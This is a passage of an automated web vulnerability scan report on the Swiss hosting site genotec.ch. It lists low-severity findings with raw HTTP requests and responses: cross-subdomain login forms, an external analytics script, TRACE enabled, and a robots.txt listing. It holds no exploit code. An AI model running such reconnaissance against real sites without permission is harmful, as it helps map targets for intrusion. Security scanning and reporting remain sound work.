The page contains a form which POSTs data to the domain webmail.genotec.ch. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-webmail" style="display:block;" class="tab">
       <FORM name="webmail" action="https://webmail.genotec.ch" method="post" target="_blank">
       <INPUT type="hidden"" value="login" name="_action">
...[SNIP]...

4.2. http://www.genotec.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form which POSTs data to the domain hcc.genotec.ch. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-hcc" style="display:none;" class="tab">
       <FORM name="hcc" action="https://hcc.genotec.ch" method="post" target="_blank">
       <h1>
...[SNIP]...

4.3. http://www.genotec.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www1.genotec.ch. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<div id="loginbox-center-wc" style="display:none;" class="tab">
       <FORM name="webcreator" action="http://www1.genotec.ch/webcreator.asp" method="post" target="_blank">
       <INPUT type="hidden" value="yes" name="weblogin">
...[SNIP]...

5. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.genotec.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 06:19:05 GMT
ETag: "1d2dbf4-3531-4a97fb980a840"
Accept-Ranges: bytes
Content-Length: 13617
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content
...[SNIP]...
<!-- START GOOGLE ANALYTICS -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

5.2. http://www.genotec.ch/de/application-hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /de/application-hosting/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /de/application-hosting/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:04:29 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 10:12:41 GMT
ETag: "1d94db7-2478-498ee6467b840"
Accept-Ranges: bytes
Content-Length: 9336
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- START GOOGLE ANALYTICS -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

5.3. http://www.genotec.ch/en/genotec/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/genotec/company/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Genotec+Ag
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmb=202063495; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:04:16 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 13:51:46 GMT
ETag: "1d84303-2511-4a2738eb4e080"
Accept-Ranges: bytes
Content-Length: 9489
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- START GOOGLE ANALYTICS --><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5.4. http://www.genotec.ch/en/genotec/company/general-terms-and-conditions/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /en/genotec/company/general-terms-and-conditions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/genotec/company/general-terms-and-conditions/ HTTP/1.1
Host: www.genotec.ch
Proxy-Connection: keep-alive
Referer: http://www.genotec.ch/en/genotec/company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=202063495.196174108.1313852670.1313852670.1313852670.1; __utmc=202063495; __utmz=202063495.1313852670.1.1.utmccn=(organic)|utmcsr=google|utmctr=Genotec+Ag|utmcmd=organic; __utmb=202063495

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:04:33 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 09:50:06 GMT
ETag: "1d83be3-26c1-49cc7c9dd6f80"
Accept-Ranges: bytes
Content-Length: 9921
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- START GOOGLE ANALYTICS -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.genotec.ch
Cookie: 637cc2f4139a0227

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:03:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.genotec.ch
Cookie: 637cc2f4139a0227


7. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genotec.ch
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.genotec.ch

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 15:04:00 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 15:18:22 GMT
ETag: "1d2dbf5-3e4-4893b595a2b80"
Accept-Ranges: bytes
Content-Length: 996
Connection: close
Content-Type: text/plain

# author Genotec AG - Switzerland
# http://www.genotec.ch

User-agent: *
Disallow: /layout-overall/
Disallow: /Library/
Disallow: /layout/
Disallow: /css/
Disallow: /includes/
Disallow: /aspnet_client
...[SNIP]...

Report generated by XSS.CX at Sat Aug 20 09:07:34 GMT-06:00 2011.